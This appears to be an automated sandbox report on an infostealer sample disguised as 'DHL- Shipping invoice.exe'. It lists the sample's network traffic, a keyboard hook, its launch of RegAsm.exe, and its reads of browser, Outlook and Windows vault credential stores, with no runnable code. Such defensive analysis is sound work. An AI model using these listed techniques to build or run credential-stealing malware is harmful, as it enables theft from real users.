                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51935
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52341
                Source: unknownNetwork traffic detected: HTTP traffic on port 55135 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 54934 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 53742 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54097
                Source: unknownNetwork traffic detected: HTTP traffic on port 52099 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 55642 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54936
                Source: unknownNetwork traffic detected: HTTP traffic on port 51442 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52514
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54934
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54939
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51782
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51783
                Source: unknownNetwork traffic detected: HTTP traffic on port 54651 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50787 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55109
                Source: unknownNetwork traffic detected: HTTP traffic on port 51006 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52195 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52513
                Source: unknownNetwork traffic detected: HTTP traffic on port 55111 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50335
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51784
                Source: unknownNetwork traffic detected: HTTP traffic on port 52086 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 54725 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55346
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54930
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55111
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52086
                Source: unknownNetwork traffic detected: HTTP traffic on port 52509 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 51516 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 55140 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52270 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53736
                Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55359
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52088
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53734
                Source: unknownNetwork traffic detected: HTTP traffic on port 50782 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53733
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55114
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55116
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55362
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55365
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52095
                Source: unknownNetwork traffic detected: HTTP traffic on port 53113 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 54731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 54995 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54959
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54958
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54956
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51442
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52099
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54156
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53742
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53192
                Source: unknownNetwork traffic detected: HTTP traffic on port 51585 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53191
                Source: unknownNetwork traffic detected: HTTP traffic on port 55569 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54728
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54725
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54960
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55135
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55137
                Source: unknownNetwork traffic detected: HTTP traffic on port 52212 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55138
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55140
                Source: unknownNetwork traffic detected: HTTP traffic on port 55346 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 55403 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 55365 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                Source: unknownNetwork traffic detected: HTTP traffic on port 50636 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 51002 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 55359 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 51635 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 54994 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50787
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51516
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51635
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51519
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51518
                Source: unknownNetwork traffic detected: HTTP traffic on port 51718 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 53733 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52514 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50782
                Source: unknownNetwork traffic detected: HTTP traffic on port 50786 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50783
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50786
                Source: unknownNetwork traffic detected: HTTP traffic on port 52210 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 55711 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52508 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 54936 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 55109 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 51389 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52204 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 53117 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51524
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51525
                Source: unknownNetwork traffic detected: HTTP traffic on port 51717 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 53734 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52513 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 54960 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55569
                Source: unknownNetwork traffic detected: HTTP traffic on port 51520 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 55116 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51520
                Source: unknownNetwork traffic detected: HTTP traffic on port 52211 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52509
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52508
                Source: unknownNetwork traffic detected: HTTP traffic on port 51525 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 55138 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52195
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
                Source: unknownNetwork traffic detected: HTTP traffic on port 54959 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52261 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52332 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 51519 -> 443
                Source: unknownHTTPS traffic detected: 140.82.112.4:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.54.158:443 -> 192.168.2.4:55569 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 222.255.238.159:443 -> 192.168.2.4:55642 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:55711 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exeJump to behavior

                System Summary

                barindex
                Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                Source: initial sampleStatic PE information: Filename: DHL- Shipping invoice.exe
                Source: DHL- Shipping invoice.exeStatic file information: Suspicious name
                Source: C:\Windows\System32\WerFault.exeProcess Stats: CPU usage > 49%
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0282E2912_2_0282E291
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_02824A982_2_02824A98
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0282AAF22_2_0282AAF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_02823E802_2_02823E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_028241C82_2_028241C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_062FD2A02_2_062FD2A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_062F1CB12_2_062F1CB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_063166282_2_06316628
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_063155E02_2_063155E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0631B2702_2_0631B270
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_063130A82_2_063130A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0631C1D82_2_0631C1D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_06317DC02_2_06317DC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_063176E02_2_063176E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0631E4082_2_0631E408
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_063123502_2_06312350
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_063100402_2_06310040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_06315D1B2_2_06315D1B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_063100072_2_06310007
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6484 -s 123052
                Source: DHL- Shipping invoice.exeStatic PE information: No import functions for PE file found
                Source: DHL- Shipping invoice.exe, 00000000.00000000.1644779633.000001B9F1852000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNewWorldOrderIsComingSoon.exeT vs DHL- Shipping invoice.exe
                Source: DHL- Shipping invoice.exeBinary or memory string: OriginalFilenameNewWorldOrderIsComingSoon.exeT vs DHL- Shipping invoice.exe
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winEXE@4/4@5/100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: NULL
                Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6484
                Source: C:\Windows\System32\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\e5a33838-8f6a-4dfe-83ee-d0645181bffbJump to behavior
                Source: DHL- Shipping invoice.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: DHL- Shipping invoice.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: DHL- Shipping invoice.exeReversingLabs: Detection: 28%
                Source: DHL- Shipping invoice.exeVirustotal: Detection: 38%
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeFile read: C:\Users\user\Desktop\DHL- Shipping invoice.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\DHL- Shipping invoice.exe C:\Users\user\Desktop\DHL- Shipping invoice.exe
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6484 -s 123052
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exeJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                Source: DHL- Shipping invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: DHL- Shipping invoice.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: DHL- Shipping invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: System.Windows.Forms.pdb.Forms.pdbpdbrms.pdbm.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb source: DHL- Shipping invoice.exe, 00000000.00000002.2922767864.0000008B15942000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: assembly\GAC_MSC:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb2 source: DHL- Shipping invoice.exe, 00000000.00000002.2922767864.0000008B15942000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: .pdbY source: DHL- Shipping invoice.exe, 00000000.00000002.2922767864.0000008B15942000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: HC:\Windows\System.Windows.Forms.pdbY source: DHL- Shipping invoice.exe, 00000000.00000002.2922767864.0000008B15942000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: symbols\dll\System.Windows.Forms.pdbW0l source: DHL- Shipping invoice.exe, 00000000.00000002.2922767864.0000008B15942000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: indows.Forms.pdb source: DHL- Shipping invoice.exe, 00000000.00000002.2922767864.0000008B15942000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: Xindows.Forms.pdb source: DHL- Shipping invoice.exe, 00000000.00000002.2922767864.0000008B15942000.00000004.00000010.00020000.00000000.sdmp
                Source: DHL- Shipping invoice.exeStatic PE information: 0xAF428149 [Tue Mar 6 01:47:53 2063 UTC]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0282A198 push esp; ret 2_2_0282A199
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_02820C3D push edi; ret 2_2_02820CC2

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 40961
                Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 29624
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49742
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49755
                Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 5678
                Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 31701
                Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 8123
                Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 9091
                Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 12000
                Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 20309
                Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 40927
                Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 9300
                Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 999
                Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 44439
                Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 3129
